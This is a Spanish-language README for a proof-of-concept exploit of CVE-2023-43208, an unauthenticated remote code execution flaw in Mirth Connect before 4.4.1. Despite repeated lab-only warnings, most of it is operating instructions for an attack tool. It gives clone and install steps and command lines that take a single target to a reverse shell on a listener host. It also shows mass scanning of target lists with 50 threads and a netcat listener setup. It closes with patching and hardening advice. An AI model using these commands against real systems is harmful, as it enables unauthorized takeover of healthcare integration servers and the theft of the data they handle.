
Un exploit de prueba de concepto para CVE-2023-43208, una vulnerabilidad de ejecución remota de código en Mirth Connect anterior a la versión 4.4.1.
⚠️ SOLO PARA USO EDUCATIVO Y EN LABORATORIO ⚠️
Un exploit de prueba de concepto para CVE-2023-43208, una vulnerabilidad de ejecución remota de código en Mirth Connect anterior a la versión 4.4.1.
Esta herramienta es estrictamente para:
NO LA USE:
Usted es responsable de cumplir con todas las leyes y regulaciones aplicables. El mal uso de esta herramienta puede dar lugar a cargos penales.
Este exploit ataca la vulnerabilidad de deserialización XML en el endpoint /api/users de Mirth Connect, permitiendo la ejecución remota de código no autenticada en versiones afectadas (< 4.4.1).
Esta es una vulnerabilidad CRÍTICA y solo debe probarse en entornos de laboratorio aislados con sus propios sistemas.
requirements.txtgit clone https://github.com/M0h4/CVE-2023-43208-EXPLOIT.git cd CVE-2023-43208-EXPLOIT
pip install -r requirements.txt
python exploit.py
# Explotación de un solo objetivo (SOLO EN LABORATORIO)
python exploit.py -u https://target:8443 -lh 10.10.14.5 -lp 4444
# Escanear múltiples objetivos desde un archivo (SOLO EN LABORATORIO)
python exploit.py -f targets.txt -t 50 -o vulnerable.txt
# Modo no interactivo (SOLO EN LABORATORIO)
python exploit.py -u https://target:8443 -lh 10.10.14.5 -lp 4444 --no-interactive
-u, --url URL del objetivo a explotar (SOLO EN LABORATORIO)
-lh, --lhost Host de escucha (su IP)
-lp, --lport Puerto de escucha
-f, --file Archivo que contiene las URL de los objetivos a escanear
-o, --output Archivo de salida para guardar los resultados del escaneo
-t, --threads Número de hilos para el escaneo (por defecto: 50)
--no-interactive Ejecutar en modo no interactivo
Configure su laboratorio:
Inicie su listener:
ncat -lnvp 4444
# o
nc -lnvp 4444
Ejecute el exploit en su laboratorio:
python exploit.py -u https://192.168.1.100:8443 -lh 192.168.1.50 -lp 4444
El exploit utiliza gadgets de Commons Collections para lograr RCE a través del endpoint /api/users.
Si está ejecutando Mirth Connect:
✅ Actualice a la versión 4.4.1 o posterior
✅ Restrinja el acceso de red a las interfaces de administración
✅ Implemente autenticación adecuada
✅ Monitoree la presencia de payloads XML sospechosos
╔══════════════════════════════════════════════════════════════╗
║ ESTA HERRAMIENTA ES SOLO PARA USO EN LABORATORIO ║
║ El uso no autorizado es ILEGAL y NO ÉTICO ║
║ Usted asume TODO el riesgo y la responsabilidad ║
║ El autor NO acepta responsabilidad por el mal uso ║
╚══════════════════════════════════════════════════════════════╝